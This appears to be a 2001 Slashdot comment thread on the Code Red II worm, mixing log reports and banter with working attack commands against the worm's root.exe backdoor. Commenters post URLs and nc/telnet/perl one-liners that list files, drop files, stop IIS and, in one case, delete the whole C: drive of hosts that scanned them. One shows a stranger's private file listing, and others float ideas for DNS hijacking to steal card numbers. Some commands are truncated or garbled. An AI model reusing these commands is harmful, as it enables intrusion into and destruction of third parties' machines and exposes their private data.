The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench.
Ahh, you left the data on the hard drive AND you told everyone where you put it. I'm gonna OWN that machine, and it's data too... Brahh ha ha ha ha.
So, has anyone ever actually won the $5 off of them? It would at least make for a good story, and a nice framed check on the wall.
Shutting down free speech with violence isn't fighting fascism. It IS fascism!
>copy con: sillymsg.txt Type some message to the user here blah blah blah ^Z (That's a ctrl-z) >notepad sillymsg.txt
Comment removed based on user account deletion
I noticed this afternoon that my recieve light was always on on my cablemodem too. It is continual arps, which I just realized were the product of infected computers trying to scan non-existent addresses, which the routers have to try to resolve.
Nice idea, but it doesn't actually work under Windows 2000 at all. Which is a shame, considering that the worm's exploit only works correctly against Windows 2000 machines.
I tried this on a couple of Windows 2000 and Windows NT 4.0 workstations around the place, as well as a "test" infected IIS system - it didn't work in any case.
No different. Just another scumbag.
Cool idea, but my guess is that most IIS boxes are not just missing one patch, but instead missing 15.
Maybe a redirect to www.microsoft.com/security instead of the 'Hacked by Chinese' message would be appropriate.
When I hear the word 'innovation', I reach for my pistol.
I seem to recall that Speakeasy will shut you down for "hacking activity," even if that activity occurred because your system was compromised. They pretty much demand that you keep your system secure in their TOS (Which I don't object to at all, mind you.)
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
But where is it going? Last time around it was pointed at the old whitehouse web server's ip. I read on incidents.org that it leaves a shell in /scripts, but have been unable to connect to one. Is this all it does? Is it going to start DoS'ing something in a few day? Or just leave rooted NT boxen around for haxors to find?
- elib
Wow that was in 1988. I'd say it's a pretty good record.
Let's count the number of IIS remote hacks and the number of apache remote hacks and see who wins.
War is necrophilia.
Couldn't you guys do something a little more constructive like: GET /scripts/root.exe?/C%20echo%20infected_by_code_red %20>%20infected_by_code_red.txt
seems to work... if you do a GET...dir afterwards, your infected_by_code_red.txt appears along with root.exe
Taking a peek at my (Apache, naturally) server logs, I see something pretty weird, though understandable given the info on CR2... I've had 11 unique IPs try to hit me for CR2, but 56 (!) unique hosts try to hit me with the original Code Red... mind you, my server is on a Class C network (yet my desktop is on a Class B network, and both boxes share the same DSL connection... figure THAT one out. :)), so that probably has something to do with it.
I just found it a little odd that the original worm is still so proliferant.
Thank fuck that that's all it is. I clicked on it there to see if it would pass the iCab test. No windows opened. Then I went to index2.html, and it asked if all browser windows to be closed (OK, or OK? :) Nothing. Yay. Of course, Konquerer prolly does all that shit too.
Not true. You can install the hotfixes before you install IIS and you'll be fine...
In fact, with W2K on the internet with no firewall, no file and print sharing, and netbios over TCP/IP disabled, you should be relatively secure...
fslg503-985-8686503-985-8686503-985-8686503-985-8
I sent this in as an anonymous story, but it looks like this one got posted instead. According to www.incidents.org there is a new variant of Code Red (of which this would be the third version). This one installs a backdoor. As someone else posted here, the tell tell sign is that the buffer overwrite payload is now a string of 'X's and not 'N's as in the previous two versions of Code Red. The stakes have been raised folks.
Because of what some cracker might have done since it was exploited, the only safe thing to do is to reformat c:\... and install a more secure operating system.
Female Prison Rape in NY
If it stopped spreading on the 21st and didn't start again until the 3rd how could the worm have still been around to spread. That means someone must have had longer than a 10 day uptime on a win2k box... I don't buy it.
I checked out a couple of boxes in the 24.x.x.x range that had bounced port 80 requests off of my firewall. They were running Win2K/IIS and had their index.htm replaced with a black page whose source contained derogatory comments concerning the "USA Government" and "PoizonBOx". Is this a function of the worm or were they 0wned post-infection?
Never underestimate the power of human stupidity.
Listen to this idea that just hit me: people have been speculating about writing a worm, "Code Green" or whatever to go through and patch the vulnerable IIS servers. What if Microsoft writes this worm, releases it, and comes out as saviors? They'd look better than ever because.
Food for thought, no?
Reality is indistinguishable from any sufficiently advanced fantasy.
Neat, huh?
Fucking Winders NT. I was going to summarily execute the machine it was running on (you guessed it - it crashed), drag it out into the car park and break into and hotwire my old best friend's dilapidated dumped de-registered car and start taking potshots, screaming howling berating and throwing Jack Daniels bottles at it whilst I reversed backward and forward over it, but then I calmed significantly and remembered that all is goo in the land of Microsloth.
Either you didn't read the message at all, or you are an extremely dumb person.
What he's suggesting is to set up Apache so that it will automatically repair any IIS servers that attack it.
Has nothing to do with whether Apache is vulnerable to anything.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
the guy puports to have "in depth knowledge" of front page 2000. First time i've heard of that as an asset...
Photos.
Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.
/.'ers are doing one of two things:
:)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmin's and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and a even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.
I'm also guessing that right now a bunch of
1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers
I propose that if a script is created to fix these servers (Code Green?
So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.
Thanks.
--
I find it really [lame|!1337|st00pid|boring] how a joke will appear and everyone will copy it. Imagine if I had a [Beowulf cluster|DDoS network|Wireless network] full of bots posting stupid clones of jokes we already saw and laughed [never|once|more than we should have] at. [All your base belong to us|FUCK THINK GEEK|Once again, mod me down]. [Mod me down|be careful what you wish for, you will be modded down|shut up you schizoid freak]. Anyway, I'm drunk, as in [Free beer|Stupid assholes, where do you get free beer?|Stupid assholes, why are you trying to compare free speech with beer? I wonder why you get so little public support|Hey, did you see Dune the mini series? It ROCKED!] [Sorry, do punctuation marks go AFTER or BEFORE the bracket?]?
[Anyway|Moving On|Madlibs are for 7 year olds at birthday parties high on sugar and plastic toy fumes], I hope we have come to an understanding that [transparent cases|shock the penguin - FUCK COMPAQ|old men with extremely wide assholes pictured on Christmas Island websites] are no longer [novel|interesting|clever.].
There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
GET /scripts/root.exe?/c%20dir%20/s%20\* HTTP/1.0 :)
at&t cable, down several hours yesterday (first time in over a month)
I'm not a JavaScript person, but how about writing a bookmarklet to take the current page's URL and query Netcraft for use of IIS and warn the user if it is? Bookmarklets are bookmarks that run small JavaScript programs - more info at http://www.bookmarklets.com/
It should accept post values of just the right type and then use the a browser to control the box. So far 29 out of the 94 sites that have tried to attach my cable modem are still active. /scripts/root.exe HTTP/1.0\\n | nc -w 1 203.45.218.169 80
echo -e GET
You will get:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
...
c:\inetpub\scripts>
if it is hacked.
I was wondering when this mutant roach would be released. How much longer till more "mimin" type ugly bugs are sent out? -quackPOT
The interesting thing was that the "cable" light on my cable modem was still on when usually when I can't get on the net it is off.
So I wonder what the problem really was. If maybe the routers were all up but the dhcp servers were down or something....
Anyone else have similar problems?
--
Garett
Even for windows users, a 120.00 linksys box and some know how will protect you. Atleast close the blatent problems and protect your internal network.
People need to realise it is like putting locks on the doors to your house. Unless your safe and secure your allowing *ANYONE IN!*
Cry me a river.
I see a couple people saying they are getting a lot more of these hits than the original code red. Considering that someone earlier posted that it attacks the largest percentage of the time in its own netblock I'm happy to have my server living in an exclusivly linux netblock. I've only seen one of this new variant so far (from 61.211.105.21 if anyone's interested.) According to my snort logs its come accross my /24 network only 18 times. It pays to have nice neighbors.
Dozings.com -- Its kinda funny... If you're as crazy as me.
Why are unix hosts getting hit so hard with this?
I think this is a fair question. I know many people who run unix machines and are reportedly getting hit quite frequently with this worm. I run a Win2k Adv server and the firewall I'm using only show 1 rouge hit from the second attempt at the worm 'CodeRedII'. I was never hit with the first one. Even if I would have been, my system was already updated.
I'm just curious. Is this worm spreading more quickly on certain IP segments, ie. @Home. Or could it be that I'm not hearing anything from the Windows users because they have their system unplugged in fear?
On a side note, I've been nailed about a zillion times with the W32/SirCam Outlook Worm. "Hey, where's the reporting on this one." I'm sending out automatic responses to those people who are sending it too me as I somehow seem to be in their address book without haveing a clue who they are.
Every system shows an occational defect. With MS it's an epidemic. Every week it's a new exploit.
War is necrophilia.
Create a symlink from default.ida in your web root dir to /dev/zero or maybe /dev/urandom. Or better yet, make default.ida a redirect to localhost or fbi.gov.
Does this Code Red Worm affect MacOS X? I havn't been targeted..yet, but I was wondering if the worm can acceft a PPC based system.
I have observed a surge in attacks from the CodeRed worm. When it started I was getting about 20 hits a day from the thing. Today I have already gotten a boatload {78} of hits from it.
I have observed a different fill character in the buffer overflow. It used to be X's and now I see N's. I am getting both varieties now.
I have attempted to call the system administrator of the domains who are launching attacks. I have suggested that they alert the users whos machines are infested and take them offline.
I have observed an increase in attacks in my IP block. I have my own domain space in Pacbells network. I have an increase in attacks from Pacbell San Francisco and Pacbell Los Angeles. I have seen adresses from taiwan and Quebec {I'm in San Francisco}. I'm running Apache and checking my log hourly.
I can't wait till this thing is dead. Get people aware of what is going on, shut down the MS servers which haven't been patched.
Link to softwaremagic.net
Michael A. Uman
Sr Software Engineer
softwaremagic.net
Hey don't worry about it man, I've got a couple of machines trawling through the address space doing deltrees on these motherfuckers. Screw NT and 2k, install Linux!
And just how does that make you any different than the assholes who released this crap? You are damaging other people's property. Trying to disinfect might be considered acceptable self-defense. Destroying someone's filesystem after a virus left their system open is just opportunistic bullying like the scum who tried to rob the guy in San Jose after he got hit by a bus.
Jackal.
"fuck USA government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cn"
Now, this IP range is for Verizon (former GTE) DSL near Seattle, WA, so nobody here would have a yahoo.com.cn address. As far as that PoizonBOx goes, I assume that is the name of the machine or something, but since I don't have any other samples to compare it to (the other IP didn't load), I can't be sure.
--
Monkey sense
But, wait a minute. I assumed that the root.exe prog in the scripts dir is what is allowing all this to happen. And I assumed root.exe was there to begin with, just now it's open season on the little scripting app. Or is root.exe added by CR2? Because if you changed the name, (is there in NT or 2k a way to change executable attributes?) It would render it useless to more attacks. Either way, that Apache admin fight back attitude is good. Could you imagine the news reporting that Apache admins were able to spearhead the CR2 Attack?
Seriously. I'll give him shit if you want. =)
Whoever is programming these virus's need to get a real life, a real job and a real woman. Stop wasting time with this.
Yes because MS does nto have enough programmers or enough money or enough computers to actually do this themselves. We should all roll up our sleeves and provide free labor for MS. Of course we should also ignore them when they call us communists, an-american and a "cancer". After all they need our help in fixing their broken systems.
War is necrophilia.
Dude, it was a joke, and thus modded as Funny, Read HAHA.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
md | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
Thanks man [woman]! That response was even better than my original comment.
... and you even caught my numerous spppeeelling errrs. Mnnnn typping onnnnna callular phune rly mks splng sk. Al ths abrs mk rdng hrd.
An tnx 4 the cmt.
Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!
Or, for even more fun:
/scripts/root.exe?/c+dir+\ HTTP/1.0
GET
The rest is left as an exercise to the reader.
Cisco page
...not to give ideas to future worm writers, but one could add the capability to target known IIS sites to the worm. You can extract tons of them off-line from Netcraft, all you have to do is put the list up on servers somewhere. The worm could (with a small probability) go to a "list server" and select targets from it.
If the "victim list servers" could be sufficiently distributed (hopefully over countries/continents), you could have sufficient resiliency to bring down most of the high-profile IIS servers pretty soon. Micros~1 would have a difficult time covering that up.
I'm on an @home network and I've been getting hit pretty hard almost since the first XXX query at about 6 this morning. Since then it's just kept building....I probably get about 60+ an hour right now, and I'd say about 99% of those are from within @home. And things have slowed down a LOT.
Just for perspective....the first time around I get hit maybe 10-15 times TOTAL by Code Red. The second time around, I've been getting 20-30 hits per day of the NNN variety, so this is quite a HUGE increase.
"fist in the air in the land of hypocrisy"
Yeah, and then they yell at your for messing up their computer when you try to clean the damn thing up a little.
I've been checking out some of the ip addresses that have been trying to send
me CR2 and I've found that there seems to be two different defacements.
The first is directed at the US government
and the second is directed at the Chinese government.
Is it possible there are two versions of CR2?
If you go to microsoft.com you will not see anything about CodeRed. however a quick search will find you this which is that patch.
One nice thing about the worm is that it is only active in memory, meaning that if you reboot your machine it will die.
The unfortunate part is that I don't see it helping much. I think the problem is that thousands of neglated NT/2K boxes with net connections, collecting dust, and getting eaten by worms. Soon this will be called the infected net, the part of the internet that has withered into sludge and pounds away at the rest of the net.
After a while the media will infect the people, soon follows the lawmakers. once that happens the goverment will madate that computers on the public net must be licenced, and maintained regularly. if you computer is infected by a worm, virus, trojan etc.. you will be issued a fine. the internet will be taxed to support the "federal internet saftey commision". a group of FCC regects that constantly moniter and scan you box to make sure you up to code.
-Jon
this is my sig.
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:43:22 GMT
Content-Length: 215
Content-Type: text/html
Error in CGI Application
CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Connection closed by foreign host.
root@gate:~# telnet x.x.x.x 80
Trying x.x.x.x...
Block WAN Request This feature is designed to prevent users from attacking through the internet. When it is enabled, the router will drop both the unaccepted TCP request and ICMP packets from WAN site. The hacker will not find the router by pinging the WAN IP address.
I have one of these. They are great for running server boxes on a cable modem. Your ISP cant port scan you and actually see anything running. Wonderful.
echo -e GET /scripts/root.exe?%20/c%20rmdir%20/s%20/q%20c:\\ HTTP/1.0\\n | nc *IP TO FUCK* 80
I'm going to run this against any fuckers who hit my web server with this. It's time to fight back.
Being located in Australia on a dial-up subnet I haven't been subject to the same deluge of connection attempts as the adsl and dsl subscribers in the USA and my hits are coming from other sources. In the 150+ hits I have had today that I can identify from the Code Red II worm the majority have been from Taiwan, a couple from India and mainland China. Currently it seems to have moved onto Korea as thats where the recent ones have been sourced. 100% of the ones I have Netcrafted (I _like_ that site) have been winblows 2000 running IIS 5. I have had one hit from a german site but I think that was a genuine attempt to find a hole. I am still in the process of collectng ip's at the rate of one at about every five to ten minutes which indicate a possibility of a _lot_ of infected machines out there.
I wonder why MSNBC isn't doing a major story on this.. Gee, I can't figure it out.. I'm just waiting for the headline stories about Microsoft's heads up coding preventing any worm like this from happening again 3 days before the next one strikes..
Who sold you the hardware? If it's Qwest (which I think it was since you HAVE to go through them for at least the DSL connection (not the ISP though) if you are in thier area) then they should be required to. If they don't then that is just horrible business practice IMO. Either way they are my ISP until I switch to another one VERY soon, and they had better have what I need. Once I get it I'll set it up for download if I can and then post it. I personally think Cisco's requirements for registration is idiotic but hey, since we're just the end users I guess it's ok to piss all over us and tell us it's for our own good (please note HEAVY use of sarcasm).
waaaa waaaaa if no one asked why, then we wouldn't be here
only I can't figure out how to actually use the backdoor.
you get "c:\inetpub\scripts>" but just typing commands does nothing.
perhaps it's only the illusion of a backdoor, maybe root.exe is just a text file containing "c:\inetpub\scripts>".. though there is always a delay before it pops up.
i guess i can stop messing with peoples poor computers and let somebody else figure it out.
Only in BC, I think.... Isn't this the BC Day long weekend?
All I know is that I have a bunch of days off in a row.
If a tree falls on an anonymous coward yelling 'first post' in the forest, does anybody hear?
Actually, the SSA (Social Security) has been hit with it. They run NT4. They only have SP3. I don't think im going to stay in a coporate country much longer. Im moving to Japan.
I have port 80 on my Cisco 675 router turned off.
In fact, it was the first thing I did when I configured the router. But somehow this Code Red worm is still hanging the router occasionally, so that I have to power cycle it. Anyone know why this is happening?
--- even the safest course is fraught with peril
I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.
:)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of a incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)
Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green?
--
Two weeks ago I had a redhat 6.2 machine compromised (by an rcp exploit) within 6 hours of installing it. ANY machine not running the very latest security patches should not be connected to a live network.
Of course, the proliferation of Win2k & IIS and worms that infect them means that you'll probably get your system probed sooner running them, but this is going to be true of any popular OS.
I've been posting on the net since 1994 and I still haven't come up with a good sig!
What about Adobe? :)
"It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
i have analyzed this new worm.
zipped IDA project file and plaintext file can be found at
http://www.eikon.tum.de/~simons/ida_root/.
cheerz
corecode
So here we basically have thousands of boxes with open backdoors, _broadcasting_ their presence to the world.
And with people so nicely distributing their logs here in this forum, the collection of ips is easier than ever!
Now that they have the backdoors, though, how hard would it be to patch them remotely? I'm thinking that if you put up a single exe on any old webserver, you could tell each infected host to just download and execute it. The only problems are writing the exe (not too hard), and figuring out how to get the host to download it, using the backdoor (probably trivial).
well it sure did happen to us. as we finished installing windows 2000, we immediately got dos attacks and ate up our e1 bandwidth.
however, when tracing the ip address, attacks have been spoofed with private and not allocated ip blocks.
is this part of the code red worm?
johnlaw
Live your life each day as if it was your last.
Most services can be jailed.
BTW Linux has permission systems if you choose to implement them. Unlike the windows world we get choices.
War is necrophilia.
There are filesystems which support ACLs you ought to look into them. As you stated there are also capability systems you can implement.
Weather to chroot services or not is a decision made by the sysadmin.
War is necrophilia.
The owners of routers should be blocking the IP addresses of any unpatched IIS servers. It is their responsibility to make sure their equiptment does not comprimise the Internet.
My range, I don't seem to find anything coming from 127.x.x.x and I installed CodeRedII myself.
148 so far today against an org in 64. space
Comment removed based on user account deletion
Yes, they shut down their pop3 server to keep it from spreading.....
:(
:-)
(i'm sure you're just crushed)
So, what do you think? Was this an intelligent move or just silliness?
either way, it sucks for me that I can't access the mail server
oh well, what can I say but: c'est câble
Having a RoadRunner acccount, I am getting hit alot. A parse of my logs is located here on a separate account I have.
My numbers are off a bit since I had my web server down for about 11 days from July 20th to July 31st.
I have received 129 CR1 scans and 267 CR2 scans so far. I have noticed that the scan rate for CR2 seems to be higher but I might just be imagining things, or it might be inaccurate due to incomplete data.
cF (Hiding behind my Linux firewall)
For those getting scanned and logging it:
Each time a host scans you, inform the user/operator/whatever of that machine that he/she is infected. How? Use the backdoor. Send a single request to the backdoor that opens up their browser to http://www.digitalisland.net/codered/ or a similar page. Just have the backdoor run "start http://whatever.url.you.choose/".
It's easy, and it can be automated. Even easier would be to just write/run a script that goes through your logs and does that for each host that attempted a scan.
http://infected_system/scripts/root.exe?/c+dir+c:\
try this
http:// {infected ip here }/scripts/root.exe?/c%20dir%20c:\windows\recent
and see what the admin's been doing!
the first time I tried this on someone, I got:
05 16 2001 11:54p 336 Cc1.avi.lnk
05 16 2001 11:54p 342 Blow1.avi.lnk
05 16 2001 11:54p 366 philly_03.mpa.lnk
05 16 2001 11:54p 335 1.zip.lnk
05 17 2001 12:13a 335 3.zip.lnk
07 14 2001 01:58p 347 Maishman Accounting.mdb.lnk
07 14 2001 01:58p 302 Dessi.doc.lnk
07 14 2001 01:58p 293 Dessi.jpg.lnk
looks like everyone loves p0rn!!!
jesus christ, think of how terrible this is.. tens of thosands of machines with ROOT ACCESS to anyone with a web browser.. credit card numbers, passwords, etc... this is INSANE.. thanks microsoft!!!
for the GOOD guys out there, try to put something on the desktop along the lines of "YOU HAVE A VIRUS!", ie echo >c:\windows\desktop\"you have a virus.txt"
Thanks a lot for your suggestion!
:-)
I tried it a couple of times, but all the time I got pages back either explaining 'the server is busy' or some such, and I did make sure to first clean out the spaces you mentioned. I didn't pay much attention to the text, but I then gave up trying, as it isn't actually *really* my problem
I only got around 110 CR2 attempts on my own server since this morning so it doesn't choke it at all or deny me any service that I have.
Most IPs must be temporary [dialup?] connections anyway, because most of them don't connect at all (ping, regular telnet 80) and it is then amazing that those people run vulnerable webservers and get attacked in the [short?] window of time they are connected.
Going to a technical job fair this weekend. Luckily I know a bit (not everything there is to know yet, if knowing everything is ever possible) about running Apache.
:-).
Maybe we'll see a rise in demand for experienced *nix and GNU/Linux users...
We'll see
StarTux
we are getting insane amounts of calls about this exact problem, and most of them from users that submit firewall logs documenting the attack, its hosing the service, routers are being taken offline left and right.
I plan to live forever, so far so good...
to notify someone that they have this, try the following:
/scripts/root.exe?/c%20echo%20f>c:\windows\desktop \ warning%20you%20have%20the%20code%20red%202%20viru s%20your%20computer%20attacked%20mine%20please%20g et%20a%20virus%20scanner.txt
http:// {infected ip here }
Im @home, and im denying and logging port 80... ive seen about 400 attempts from differnt ips in the 24 addys. go @HOME!
Does the worm close off any subsequent attacks? I cannot see that it does. I have been looking at a few logs and see that both the anti-US hack as well as the SirCam hack can co-exist on the same server.
Is it possible to write a similar script that will a) re-write default.asp to a more friendly hack -- stating that the host is wide open and have re-set perms so that it cannot be hacked again? Basically deadbolt the door behind you?
There could be a new format of warfare out on the net, where the good worms are in a race against the bad. It seems though that it would definitley test the prowess of the best coders out there!!!
How about just call "net stop {IIS service name}"? I forgot what the IIS service name is...
It's not safe to install IIS or any MS OS. Period. Don't plug it in after you've installed; you know that you'll be hit again. Install a real OS--Linux, FreeBSD, OpenBSD, NetBSD--and go to town. They're all general-purpose OSes. They can all do what you need. Deal with their problems; it's better than deal with Microsoft's.
Capability systems are far more complex than older, permissions-based systems. But don't we owe it to ourselves to use some of our spare CPU cycles and bytes to actually do something? With the right administration tools, capabilities should be doable. And worms like Code Red would be made much more difficult.
My machine was online for about 24 hours yesterday via @home, and I logged 197 http requests, which I suspected were caused by CodeRed. I've been online today for less than 1/2 an hour, and I've got 17. It really is slowing the network down badly.
The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.
- Operating systems are more complex than cars.
- Operating systems don't require a license to be operated.
Irrelevant. There are plenty of products that are more complex than cars, and consumers are still protected if they fail dramatically. Pharmaceuticals, for example. Designing a molecule and testing it is at least as difficult as designing a car.
Do you seriously think that the complexity of the product is an excuse? That's crazy. Far better to ask the companies to simply know their limitations, and not ship products that they can't build to reasonable standards of quality.
The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.
I don't mean to sound sue-crazy -- but the only deterrent we, the public, have, is our ability to use the legal system to whack companies that try to pull a fast one on us. If we lose that ability, we'll have nothing but crap to choose from.
perhaps http://infectedser/scripts/root.exe?/c+md%20c:\no
I can tell you that I work for a VERY large corporation and after this weekend of hell, we may seriously think about removing all IIS from the enterprise.
65.3.142.118 - - [05/Aug/2001:13:54:13 -0700] "GET /default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXXXX$
/default.ida?NNNNNNNNNNNNN$
/default.ida?XXXXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXXXXX$
/default.ida?XXXXXXXXXXXX
65.3.198.25 - - [05/Aug/2001:13:54:42 -0700] "GET
65.3.36.203 - - [05/Aug/2001:13:55:33 -0700] "GET
65.3.25.229 - - [05/Aug/2001:14:01:32 -0700] "GET
65.3.198.65 - - [05/Aug/2001:14:03:37 -0700] "GET
65.3.7.109 - - [05/Aug/2001:14:06:23 -0700] "GET
206.218.150.55 - - [05/Aug/2001:14:09:57 -0700] "GET
65.3.84.67 - - [05/Aug/2001:14:10:06 -0700] "GET
65.11.72.158 - - [05/Aug/2001:14:12:45 -0700] "GET
65.3.200.229 - - [05/Aug/2001:14:14:12 -0700] "GET
65.3.214.216 - - [05/Aug/2001:14:14:17 -0700] "GET
65.25.173.24 - - [05/Aug/2001:14:14:20 -0700] "GET
All this crap is coming mostly from the @home Class A.
Comment removed based on user account deletion
There's been stacks of Unix worms this year:
* l10n
* adore
* Red Worm
and a whole bunch of variants.
And there will be more in the future as Linux becomes more mainstream. A virtus would also be compltely possible - sure, default permissions mean a virtus acting on behalf of an ordinary user can't do nasty thigns to `cp', but it can delete that users last 5 years of work.
Linux still lacks a real permission system, and there are unfotunately still many apps which run with unnecessary root privileges, rather than single-root-cpomponent (think Postfix) or 2.4s capabilities (think ProFTPd).
As always, it's being improved, but I've verified this script works on my server:
CodeRed Counter Script
The Logs, note Confirmation Log.
Now I just need to figure out that win32 command line to set the IP address to 10.1.2.3.
My cable modem is getting flooded by ARP requests from the @Home routers.
I want to delete my account but Slashdot doesn't allow it.
Oh hell, I blew that file away a long time ago. When I set up IIS I wasn't about to get screwed over by a bunch of default settings. I wiped out all the presets and defaults and started from scratch. Directory structure, user persmisions, file permissions, the whole works.
Someone explain this to me.
Apache Blvd, ok, I get it now... its the heat, really...
I'd like to add to that... "net send 127.0.0.1 Your system has been compromised. Please install Linux (or BSD or whatever) to correct."
You mean RH 6.2. My RH 7.0 box is still running 24/7 unpatched, because the only things listening by default are apache and identd.
I trust apache, and I find it difficult to believe someone could fuck up identd.
I haven't seen a post on this and I hope I don't spark the idea, but I think a bigger threat, other than being an individual target of 100,000 UDP packets, is running a broadcast ping from these machines. Talk about generating a lot of network traffic. For those who are trying to slow the spread of this problem by 'fixing' remote machines, you might want to rename ping.exe to something else just so it's not used, since the machine is broken anyway....
- Posted anonymously so I don't get accused of 'encouraging' anything. Not that I'd be found guilty, I just can't afford the court fees.
The funny thing is, it would be illegal to help in this way.
Fuck the system? Nah, you might catch something.
I've spent the last few hours being nosy as the worm spreads through 64.111.*.*. The backdoor appears to not be a rootkit, exactly, as I've encountered 'Access Denied' messages while poking around in people's files. Maybe the worm just runs with the Web server's permissions. Don't know much about NT.
I see a lot of evidence that nobody is really maintaining these boxes. They're littered with FOUND.nnn directories and questionable software. I saw installations of AOL 4.0 (!), 6.0, ICQ and Instant Messenger, and games like HL: Opposing Force on lots of corporate servers. It looks like a lot of these servers are also people's personal workstations; I found the details of some poor bastard's order from nike.com, along with other personal financial files. They're lucky I'm just a bored wanna-be hacker instead of some luser cracker who gets off on messing up other people's boxen.
Does this exploit give enough rights to modify the hosts file or DNS configuration for DNS servers? Could you redirect users of some popular e-commerce and/or banking sites to fake sites? Bit of trouble, but might get lots of credit card information etc. Hell, you could even run fake sites off other infected boxes, and if you have the rights, just wipe the logs yourself.
net stop w3svc stops their iis
batcomputer# fgrep 'default.ida?XXX'
perl -ne 'use LWP::Simple; chomp; get("http://$_/scripts/root.exe?/c+start+http://w
oops typo i mean
batcomputer# fgrep 'default.ida?XXX'
perl -ne 'use LWP::Simple; chomp; get("http://$_/scripts/root.exe?/c+start+http://w